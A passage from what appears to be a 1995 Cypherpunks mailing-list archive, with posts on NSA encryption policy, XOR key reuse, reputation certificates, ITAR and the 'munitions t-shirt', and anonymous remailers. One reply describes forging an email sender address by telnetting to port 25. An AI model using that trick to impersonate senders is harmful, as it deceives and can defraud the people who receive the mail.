of cyberspace" around the world. don't you think they could be quite effective in killing the Internet as it was growing? it would be quite trivial to insert agent-provacateurs into all the open standards-making Internet conventions. where would we be now if this happened? cryptography is very intrinsic to cyberspace, and it would be quite ubiquitous now if it werent for the reprehensible covert and overt NSA wrench-throwing acts. the NSA is sabotaging the natural growth of cyberspace, uneqivocally. I hope that every person in the NSA who reads about Netscape or uses it, the Web, or the Internet, hangs hi/her head in shame, that he worked in an agency that helped work *against* the reality that created these wonderful embodiments of freedom in communication. >> you see, there is far more to be gained from widespread >> encryption than is to be lost from it. > >Agreed. actually, to tell you the truth I don't consider that a given. it is very well possible that a huge advantage shifts to the terrorists of the world. it very well may be!! but is anyone actually trying to unbiasedly *answer* this question with honest research? of course not. the NSA, the FBI, the whole law enforcement community is in total CYA mode. we have Freeh actually utter at a press conference, "would you feel the same about strong encryption if your daughter was kidnapped by a pedophile?" or whatever his little @#$%^^&* phrase was....anybody remember that slimy epithet of his? for god's sake, could someone in the government do a study of what would *actually happen* if there was widespread encryption, instead of letting the NSA's apparent default idea of "apocalypse now!!!" rule the whole debate?? the NSA is always talking about "the right to communcation balanced with the needs of law enforcement", but have they ever determined what in fact the costs are to society at large? beyond simply ASSUMING that if a policeman complains that he can't tap a phone line, that the world is really going to end tomorrow?!?! has it ever occured to law enforcement agencies that widespread encryption may actually make their lives *easier*?? I could see a situation where this is possible. the police routinely say, "sorry ma'am we can't do anything because our hands are tied". if the police and our government were prevented from any intervention into any area involving cyberspace, perhaps both society and the police would breath a lot easier!! --Vlad Nuri From p.v.mcmahon.rea0803 at oasis.icl.co.uk Sun Sep 3 19:36:17 1995 From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk) Date: Sun, 3 Sep 95 19:36:17 PDT Subject: European wilingness to pay ... Message-ID: <199509040220.24023.0@getafix> > also, Bob Morris said in his talk, acc. to Gillogly, that Europeans > *were* willing to pay for encryption in their phones, but those in the > US weren't. please expand on that little nugget!! how did you come Presumably this is a reference to GSM. - pvm From patrick at Verity.COM Sun Sep 3 19:42:08 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Sun, 3 Sep 95 19:42:08 PDT Subject: Crypto '95: Robert Morris Message-ID: <9509040238.AA04342@cantina.verity.com> > So Robert Morris worked for NSA. > Does that mean that the infamous 1988 Internet Worm > was part of a NSA-sponsored intelligence-gathering mission? > No, that was his kid! Imagine his chagrin! Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From sinclai at ecf.toronto.edu Sun Sep 3 20:16:35 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Sun, 3 Sep 95 20:16:35 PDT Subject: maximizing cryptographic return In-Reply-To: <199509040149.SAA01359@netcom10.netcom.com> Message-ID: <95Sep3.231607edt.994@cannon.ecf.toronto.edu> > I was wondering how secure the following algorithm would be for phone > calls: suppose that at the beginning of each session, the random > key is traded using RSA or some other very secure approach. the > key is a *random bit width*, say 100-6000 bits. now, my question is, > I wonder if some very cheap algorithms, in terms of computation time, > could be used for the "on the fly" encryption of the voice using those > bit. would XOR with the pad be totally out of line? > > the situation is such that trivial algorithms such as XOR with *unlimited > cyphertext* can be broken quite trivially. but it seems to me this > dogma that "XOR is WEAK" is based on the premise that you have a huge > amount of cyphertext to play with. take away this premise, that you > have a session key that is guaranteed to really give you very little > cyphertext, do these supposedly "weak" algorithms then become pretty > secure? No, XOR is weak if used even twice. If you XOR the two pieces of cyphertext with each other, you get the two plaintexts XORed. I'd be willing to bet that the human ear can understand two audio signals XORed. Certainly with practice people can understand audio that has been encrypted with frequency inversion. Pre-encryption compression would solve this, but XOR is still very weak. From cme at clark.net Sun Sep 3 20:38:22 1995 From: cme at clark.net (Carl Ellison) Date: Sun, 3 Sep 95 20:38:22 PDT Subject: rump session papers Message-ID: <199509040337.XAA15787@clark.net> I ran out of copies of my rump session paper handouts. So, I put them on my ftp server... ftp://ftp.clark.net/pub/cme/ps/ cepp.ps :: a couple of symmetric modes for block ciphers which I threw out for people to attack.... k1.ps :: Key exchange algorithm K-1 -- with some very suggestive properties. Whit Diffie titled this one "If S-1 is Skipjack, then K-1 is KEA" in the rump session list. I'm not about to make that claim -- but it *does* have some interesting characteristics. Enjoy, Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From futplex at pseudonym.com Sun Sep 3 21:43:14 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 3 Sep 95 21:43:14 PDT Subject: Wearing RSA shirt to school In-Reply-To: <199509040130.VAA35298@tequesta.gate.net> Message-ID: <9509040443.AA00884@cs.umass.edu> I wrote: > With respect to possession within the U.S., there aren't any > laws stopping you from waving strong cryptography around wherever you like > (at least, not yet). ---- ...and in private email, Jim Ray pointed out that showing the shirt to a foreign national might technically violate ITAR... ---- Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then flashing it at a furriner could constitute a violation. Thanks for the correction. The gist of my previous message remains: No local or state authority in the U.S. (of which I'm aware) classifies strong cryptography as a munition, weapon, etc. I haven't heard of any restrictions on transporting crypto across state lines, either. Unless the Feds start cracking down on high schools, or the Perl-RSA shirt somehow violates some school dress code, (gang colors ? ;) the original questioner need not fret about his son wearing the shirt to school. -Futplex, just another slimy tentacle of the List Maintainer From hfinney at shell.portal.com Sun Sep 3 21:52:26 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 3 Sep 95 21:52:26 PDT Subject: pseudonyms & list health Message-ID: <199509040451.VAA23173@jobe.shell.portal.com> From: "Vladimir Z. Nuri" > hence, what I am suggesting is that one > of the "stable attractors" that TM is always talking about > may be a reality in which people pool most of their accomplishments > under a single nym. furthermore, they will wish to avoid conflict > with other nyms in respect to attribution. > isn't this, functionally, the equivalent of the supposed > anti-cypherpunk "true names"? An interesting point. I have long wished that there would be a form of "credential certificates" which people could give as special signatures on other people's public keys. Then using Chaumian credential technology it would be possible to anonymously transfer these credentials from one pseudonym to another. This is not a perfect solution, of course. Much reputation is informal and simply resides in the opinions held in people's minds. But perhaps if a more structured solution like this became widespread it would help to prevent the "concentration of reputation" which Vlad describes. Along with the usual flames, I occasionally get messages saying nice things about postings I have made, and I sometimes save these in a file called "praise". Here are some excerpts: > Again, thanks for posting some useful information that > actually has *direct relevance to crypto*. > I really enjoyed reading this. It was well written and comprehensive. > Thanks for sharing it. > Nice post! I certainly appreciate these kinds of comments, but it would be even more useful if such messages were expressed as the kinds of certificates I am describing. I wonder whether people would be willing to use a program which would let them issue such "reputation signatures" of various kinds, and display the signatures which were present on keys. Discussion of such schemes has often bogged down in considering the various categories or types of credentials people might want to give. This is somewhat analogous to the "rate-the-net" schemes we have talked about where a similar issue arises if we try to mark pages with a whole range of characteristics so people can judge whether they should let their kids read them. Perhaps the solution needs to be found in simplicity. SurfWatch (as I understand it) gives a simple "thumbs down" to selected web pages. Maybe a simple "endorsement" would be useful as a reputation credential without trying to identify exactly what it is about the person you are endorsing. I could see such a system initially being piggybacked on PGP keys (the signatures would not be understandable by PGP though), although for Chaumian credential transfers the keys have to be specially structured and that would require a new approach. Who would be willing and/or interested enough to use such a system if it existed? Hal From rrothenb at ic.sunysb.edu Sun Sep 3 21:54:45 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Sun, 3 Sep 95 21:54:45 PDT Subject: Oddly enough, Clipper is helpful Message-ID: <199509040454.AAA05091@csws5.ic.sunysb.edu> Despite a few rants about how the NSA has monkeywrenched potential standards for encryption with Clipper (market forces being what they are, even if there were no Clipper we may still have no standard by now...), I think there is oddly a good side to Clipper: the issue has thrown cryptography and security into the public debate, even if marginally. Prior to Clipper, PGP was not featured in national and international features in TV, newspapers and magazines... now a lot of people want their hands on it. People have become aware of communications security issues--very avaerage folks who one might even consider techno-illiterates or luddites are now concerned with the government's ability to listen in and watch them. Think of Clipper as an opportunity to propose something better, as an opportunity to make people more aware of the issue. From tcmay at got.net Sun Sep 3 21:56:43 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Sep 95 21:56:43 PDT Subject: Clinton's Black Helicopters Over My House! Message-ID: ObConspiracy content: high. They are coming to take me away, take me away! Clinton's black helicopters are swooping low over my house. What should I do? Yes, this has nothing to do with coding in C, or even coding in Java, but it's too good a story not to share with you. My hilltop house, in the Santa Cruz mountains, lies directly between Monterey and San Jose. His Excellency is landing tonight in Monterey--probably has just done so, judging by the sudden increase in air traffic--to dedicate tomorrow a "defense conversion" of the former Fort Ord to "Cal State Monterey Bay," a new state college. (In California there are three tiers of colleges: the 9 campuses of the University of California system (Berkeley, UCLA, UCSC, UCSB, UCSD, etc.), the twenty-some "Cal State" schools, and some ungodly number of Community Colleges.) Anyway, lots of choppers flying directly over my house, at fairly low altitude. Maybe I could spell out a Cypherpunks message in white stones in my driveway, or maybe just a rose? He'll be choppering from Monterey to Alameda tommorrow, after lunch, so I need to think of something to prepare for him. I'm tempted to try to take a photo with my telescope, but the choppers flying with him might think I had a Redeye or Stinger or something from the weapon shops of Isher, and send me back at least a visit by the Praetorians, so I'll avoid "looking dangerous" in my back yard as the choppers pass overhead. (I find it hard to believe what the scribblers are saying, that this is the first visit by a sitting President to Monterey in 100 years. What with Carmel and Big Sur nearby, kind of hard to believe, eh?) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rrothenb at ic.sunysb.edu Sun Sep 3 22:06:16 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Sun, 3 Sep 95 22:06:16 PDT Subject: pseudonyms & list health In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com> Message-ID: <199509040505.BAA05115@csws5.ic.sunysb.edu> *My* willingness to use such a system would depend on the system. Of course, if you create such a system there will be somebody who uses it... how well and in what circumstances, and how many people, use it, is another matter. My worry is about abuse. One would prefer to save endorsements and find a way to remove thumbs-downs... also how to prevent one from overdoing a thumbs-up or -down certification for a person (either to inflate or de- flate a reputation). In terms of persons, I see this more as an electronic equivalent of medals awards, or those nifty little smiley stickers my second grade teacher used to give. After a while they become meaningless. Systems to rate web-sites, newsgroups, etc. in terms of specific qualities (sexual content, religious sentiment, useful information, technical/skill level of material, size of posts/files, etc.) that showed the given ratings of various organizations or people who were certified to rate on that system would be good... if implemented properly. From tcmay at got.net Sun Sep 3 22:07:51 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Sep 95 22:07:51 PDT Subject: Wearing RSA shirt to school Message-ID: Grumpiness warning: I have held my tongue the past few months as all of these "this t-shirt has been declared a munition!!!" messages went out, but I can hold my tongue no longer. At 4:43 AM 9/4/95, Futplex wrote: >I wrote: >> With respect to possession within the U.S., there aren't any >> laws stopping you from waving strong cryptography around wherever you like >> (at least, not yet). > >---- >...and in private email, Jim Ray pointed out that showing the shirt to a >foreign national might technically violate ITAR... Nope, no more so than letting a foreign national read Schneier's book is a violation of the ITAR. If you dispute this, ask whether Schneier's book is banned from export (the book, not the optional diskette). It isn't. Nor are other cryptography _books_ banned from export. I'm not minimizing the issue of export of machine-readable code, as in diskettes. But to claim that a blurry, printed on cotton "barcode" is even remotely in the same class as exporting a workable set of cryptographic system routines, or that letting a furriner merely "gaze upon" this blurry barcode, is a violation of the ITARs is laughable. >Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover >the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then >flashing it at a furriner could constitute a violation. Thanks for the >correction. No. No more so than "flashing" a copy of a crypto book would constitute a violation. > >The gist of my previous message remains: No local or state authority in the >U.S. (of which I'm aware) classifies strong cryptography as a munition, >weapon, etc. I haven't heard of any restrictions on transporting crypto >across state lines, either. Unless the Feds start cracking down on high >schools, or the Perl-RSA shirt somehow violates some school dress code, (gang >colors ? ;) the original questioner need not fret about his son wearing the >shirt to school. It was this series of posts about whether wearing the "munitions t-shirt" near schools was a crime or not that made me think the silly season had arrived. If the t-shirt is a munition, and books are munitions, then libraries must be real "ammunition dumps," ready to explode at any minute. News at 11. Let's get real. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ethridge at Onramp.NET Sun Sep 3 22:12:51 1995 From: ethridge at Onramp.NET (Allen B. Ethridge) Date: Sun, 3 Sep 95 22:12:51 PDT Subject: ASN.1 and Kerberos version 5 Message-ID: >I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it >worked >then ASN.1 would be very very usefull. But is just plain don't. > >ASN.1 is worse than useless, it means that a very good idea is rendered >unusable >because of a baddly botched implementation. > I'm not familiar with ASN.1 except for the occasional short piece in various books. But i was under the impression that it was similar to the language used to define TCAP and ROSE standards. These standards are reasonably well defined. I've gotten to the point where i get annoyed when working with protocols that treat everything like abitrarily organized bits and bytes (like NA Cellular protocols and PGP). So, would use of the language used to define TCAP and ROSE applications be a possibility? I've occasionally thought about developing such a protocol for PGP. allen From tcmay at got.net Sun Sep 3 22:58:32 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Sep 95 22:58:32 PDT Subject: Reputations and Reading Preferences Message-ID: (This post has a second part, "Using Web Sites to Get Distributed Ratings," which you might want to read even if the first part looks uninteresting.} Hal has some interesting comments, as usual, about how positive feedback about authors can be integrated into mail readers and news readers. (Or at least I took Hal's post as a jumping off point to think about these issues--again.) I've given this some thought recently, but have reached no firm conclusions, except: it's probably not needed by most of us. That is, I have little interest in what others think. If the herd votes that "America's Funniest Home Videos" is their favorite program, or that Jackie Collins is their favorite author, who cares? At least I don't. I don't read stuff on the basis of a "beauty contest." I suspect the same is true of many others. But Hal was perhaps thinking in terms of the more sophisticated approach of creating scoring systems in which a matrix R[u,v] is created, where each element corresponds to the rating of u given by v. On the Cypherpunks list, for example, with more than 500 subscribers, each of the 500 might have a rating of perhaps 100 of the active posters, maybe only the 20 or 30 most active and memorable posters. (That is, many of you 500 readers would not have a meaningful entry, just because you have posted so little.) And more sophisticated models take into account one's reputation given to the views expressed by others. That is, some of those R[u,v] are discounted, some are held in high esteem. This results in a further weighting of the reputations. As an example, Madonna gives a good rating (0.8) to Da Dogg Pound, but I dislike Madonna and her taste, so I weight her rating accordingly. And one can imagine scoring systems in which cumulative ratings are considered. E.g., a lot of people whom I respect like the works of Thomas Pynchon, so I'll give him a try. (I use a simple scoring system in YA-Newswatcher, though it needs more work, IMO.) Things rapidly spin out of control, in terms of the communication needed, the difficulty of getting participation (like a lot of polls, the most thoughtful often are the least likely to respond), and so on. A few years ago on the Extropians list this was a hot topic, and various "rating systems' were proposed. I recall a particularly complex scheme by Alexander Chislenko which purported to solve this problem...unfortunately, it still looked to me to have the essential characteristics of a beauty contest. Fortunately, I can't see the need. Why not? And what's the better alternative? Here's a recipe which seems to work pretty well, and not just for me: * Apply filters based on one's own likes and dislikes. Killfile some posters, skip some threads, etc. * Periodically get inputs from others that one respects, a la book recommendations, movie reviews, etc. This effectively generates what the mass rating scheme would generate, albeit not identically (how could it?). One's favorite posters get read, and one's favorite posters can make some recommendations of other authors one should look at. Informal, but with many emergent advantages. Using Web Sites to Get Distributed Ratings Concretely, one way to do this is for people to do what Eric Blossom is doing with his "Cypherpunks Lite" mailing list. Or with the Web archives that Todd Masco has been running, and that Jay Campbell just started. Imagine: Rudy the Rater sets up a mail-to-Web-site archive, using whatever these folks above are using. Except, he screens the stuff to separate the bad from the good, using whatever criterion he thinks is right. People either use his site, or don't. (A Web site has some logistical advantages over subscribing to various mailing lists which do the same filtering.) Other services emerge with differing rating criteria, different aesthetic standards of goodness, or even different interests. (Some sites could filter out all of the political posts, others could filter out all the programming posts, etc.) Readers could pick the sites they wish to read, and simultaneously be exposed to authors they might have otherwise overlooked. The authors they like, and the filtering of the site operator, create a "clique" (as in math terminology) that effectively is similar to the vector weighting scheme present in the R[u,v] scheme. An advantage of the distributed site model over the R[u,v] model is the lack of any central coordination, the market anarchy of the process. Shared kill files are another possibility. As kill files become more commonly used, they may be traded around, weighted in the same way as described above. Again, I claim that an adequate and workable solution is not to solve the more general problem of everybody rating everyone else, but just of having access to a limited number of killfiles from people one respects. These approaches are doable today. Especially the distributed Web competing "best of" sites. I may do one myself! (If Jay Campbell lets me have Web stuff on his system.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From suedeenim at censored.org Sun Sep 3 23:06:28 1995 From: suedeenim at censored.org (Sue Deenim) Date: Sun, 3 Sep 95 23:06:28 PDT Subject: pseudonyms & list health Message-ID: <199509040606.XAA29059@mailhost.primenet.com> Is this what your looking for? Love Always, Sue Deenim >but what if these people had just stopped subscribing under >their clear name? and started using a pseudonym? > >well, just some musings for those who unabashadly promote pseudonyms >to contemplate. > >--Vlad Nuri > > -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From pfarrell at netcom.com Sun Sep 3 23:11:39 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sun, 3 Sep 95 23:11:39 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations Message-ID: <50697.pfarrell@netcom.com> > I know of a couple of alternative places. I too got tired of Netcom's anon ftp server. An unaltered, ASCII copy of Tim's CP-FAQ is available as http://www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ This is a low usage site, so response should be fine. BTW, there is a page for the DC-area Cypherpunks as http://www.isse.gmu.edu/~pfarrell/dccp/index.html And a guide to every US GovernmentWWW page that I could find (including locations of spook facilities) starting at http://www.isse.gmu.edu/~pfarrell/government/usgov.html Other crypto related resources are available starting at http://www.isse.gmu.edu/~pfarrell/crypto.html Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From futplex at pseudonym.com Sun Sep 3 23:14:09 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 3 Sep 95 23:14:09 PDT Subject: pseudonyms & list health In-Reply-To: <199509040505.BAA05115@csws5.ic.sunysb.edu> Message-ID: <9509040614.AA01461@cs.umass.edu> Deranged Mutant writes: > My worry is about abuse. One would prefer to save endorsements and find > a way to remove thumbs-downs... also how to prevent one from overdoing a > thumbs-up or -down certification for a person (either to inflate or de- > flate a reputation). A few nuisance lawsuits from people who were given thumbs-downs might do the trick, as with employment recommendations in the U.S. :[ > In terms of persons, I see this more as an electronic equivalent of medals > awards, or those nifty little smiley stickers my second grade teacher used > to give. After a while they become meaningless. ObTim: As in other reputation markets, some people will spread their blessings more liberally than others. They do this at the risk of diluting the worth of each credential granted. It all comes out in the wash. A reviewer named Susan Granger, for example, is known to me as a person who routinely lauds lousy movies. Thus it's simple for me to ignore her positive recommendations (I've yet to see a negative review from her). In fact, when I observe that a new film prominently features her seal of approval in its advertising, I take that fact as an indication of the lack of praise from more discriminating reviewers. So a nominal "positive" credential may be interpreted as an implicit negative credential, depending upon context. OTOH, if I only give digital thumbs-up to a couple of people on the list, those who consider me a reputable appraiser-of-cpunks should find the information relatively useful. I'm sure I can manage to be a harsher critic than your 2nd-grade teacher :} Using e.g. a single 1-10 scale would be highly practical for such purposes, IMHO. -Futplex From starrd at starrd Sun Sep 3 23:19:40 1995 From: starrd at starrd (starrd@iia2.org) Date: Sun, 3 Sep 95 23:19:40 PDT Subject: Direct Socket to Remailer? In-Reply-To: Message-ID: On Fri, 1 Sep 1995, Lance Cottrell wrote: > You should try the telnet port 25 trick. It is amazingly simple (but not > secure). Just "telnet some.machine.com 25" and type help. It will guide you > through it. It is quite informative. Se sure to test it first, sometimes it records who *really* sent it as well as the "forged" return address. Test it by mailing to yourself and then look at all the headers. ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From starrd at starrd Mon Sep 4 00:00:47 1995 From: starrd at starrd (starrd@iia2.org) Date: Mon, 4 Sep 95 00:00:47 PDT Subject: Clinton's Black Helicopters Over My House! In-Reply-To: Message-ID: On Sun, 3 Sep 1995, Timothy C. May wrote: > My hilltop house, in the Santa Cruz mountains, lies directly between > Monterey and San Jose. His Excellency is landing tonight in > Monterey--probably has just done so... > (I find it hard to believe what the scribblers are saying, that this is the > first visit by a sitting President to Monterey in 100 years. What with > Carmel and Big Sur nearby, kind of hard to believe, eh?) Oh shit! There goes the neighborhood! ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From liberty at gate.net Mon Sep 4 05:33:18 1995 From: liberty at gate.net (Jim Ray) Date: Mon, 4 Sep 95 05:33:18 PDT Subject: Wearing RSA shirt to school Message-ID: <199509041203.IAA38469@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Tim wrote: >At 4:43 AM 9/4/95, Futplex wrote: >>I wrote: >>> With respect to possession within the U.S., there aren't any >>> laws stopping you from waving strong cryptography around wherever you like >>> (at least, not yet). >> >>---- >>...and in private email, Jim Ray pointed out that showing the shirt to a >>foreign national might technically violate ITAR... > >Nope, no more so than letting a foreign national read Schneier's book is a >violation of the ITAR. If you dispute this, ask whether Schneier's book is >banned from export (the book, not the optional diskette). It isn't. Nor are >other cryptography _books_ banned from export. The law doesn't have to be consistent, or to make sense, or be enforced evenhandedly. The law is, after all, not written, or interpreted, or enforced, by partisan Libertarians like me. My private email to Futplex said *may* violate... and I stand by it. [IANAL, though.] Whether or not a law as incontrovertably stupid as ITAR is enforced may depend on the timing of the next election, as we seem to be witnessing in the limbo-state of PRZ. >I'm not minimizing the issue of export of machine-readable code, as in >diskettes. But to claim that a blurry, printed on cotton "barcode" is even >remotely in the same class as exporting a workable set of cryptographic >system routines, or that letting a furriner merely "gaze upon" this blurry >barcode, is a violation of the ITARs is laughable. Yes, but *many* laws are laughable. >>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover >>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then >>flashing it at a furriner could constitute a violation. Thanks for the >>correction. Actually, it was less a correction than me pointing out (yet another) note of uncertainty. James Madison, in Federalist #62 said it best: "What indeed are all the repealing, explaining, and amending laws, which fill and disgrace our voluminous codes, but so many monuments of deficient wisdom." Now, many of us would be more than satisfied to get back to that level of government. I suggest that everyone go have a look at the entire Code of Federal Regulations, before the next election. >the original questioner need not fret about his son wearing the >>shirt to school. I agree that wearing it through Customs on the way to Jamaica would be more problematic, but I live next to a US Customs agent, and he learned about ITAR from me. Here in Miami, Customs has plenty to think about with the various (occasionally venomous) inbound cargo. >It was this series of posts about whether wearing the "munitions t-shirt" >near schools was a crime or not that made me think the silly season had >arrived. It has, a long time ago. Ever watch C-SPAN? JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMEro1W1lp8bpvW01AQHKsgP/bhOcCUoksLvbGe/nAKxDqZU8KvibvRFm nQ++Xy3FjDDJrFg1/lgmivtrriuFK/xg4CvKdu+yQ6zJ72pH+92cLivsfHeg+ljZ MPSXfHftaOP7i1e4KajnlC3jBcYbWQnqZRdduIyPXZnfn5xK5bU99c5oceCABtSx UD/Hp9Poqbc= =7tMD -----END PGP SIGNATURE----- Regards, Jim Ray See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ------------------------------------------------------------------------ Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf ________________________________________________________________________ From jya at pipeline.com Mon Sep 4 05:47:45 1995 From: jya at pipeline.com (John Young) Date: Mon, 4 Sep 95 05:47:45 PDT Subject: MAN_iax Message-ID: <199509041247.IAA05904@pipe4.nyc.pipeline.com> 9-4-95. NYPaper: "Computers Beware! New Type of Virus Is Loose on the Net." A new and deceptively simple type of computer virus, one that can sneak past security devices by hitching rides on electronic mail and other common Internet files, is causing deep concern among computer security officials around the world. Mr. Schmidt of Sun says, "There are criminals in the world and some of them are programmers. With computer networks, they have an amplifying effect that they've never had before. If I were a criminal with a gun, I might attack one person. But with a computer network, I can attack a million people at a time. It's like an atomic bomb." To avert a potential disaster, Mr. Schmidt has enlisted three of the world's top computer security experts, including Tsutomo Shimomura, Dan Farmer and Whitfield Diffie. "Cybervirus Whodunit: Who Creates This Stuff?" Ms. Gordon conducted detailed interviews, by electronic mail, Internet chat, telephone and in person, with more than 60 virus writers. "The virus writer has been characterized by some as a bad, evil, depraved, maniac, terrorist, technopathic, genius gone mad, sociopath." This, she said, "is a gross oversimplification of the situation." "Dick Tracy, Eat Your Heart Out." Move over, Captain Midnight. Heads up, Mata Hari. Now anyone can have a real-life decoder ring. The ring has a computer chip encoded with an identification number that gives the wearer access to secret computer files or locked rooms. The chip transmits your secret ID number or data at the space-age speed of 16,000 bits a second. Triplets: MAN_iax From rsalz at osf.org Mon Sep 4 06:08:36 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 4 Sep 95 06:08:36 PDT Subject: Wearing RSA shirt to school Message-ID: <9509041307.AA20870@sulphur.osf.org> >Let's get real. Yes, please. The head of Sun's network security group is a foreign national. They're doing DES and public key work. :) From raph at CS.Berkeley.EDU Mon Sep 4 06:52:07 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 4 Sep 95 06:52:07 PDT Subject: List of reliable remailers Message-ID: <199509041351.GAA20450@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: 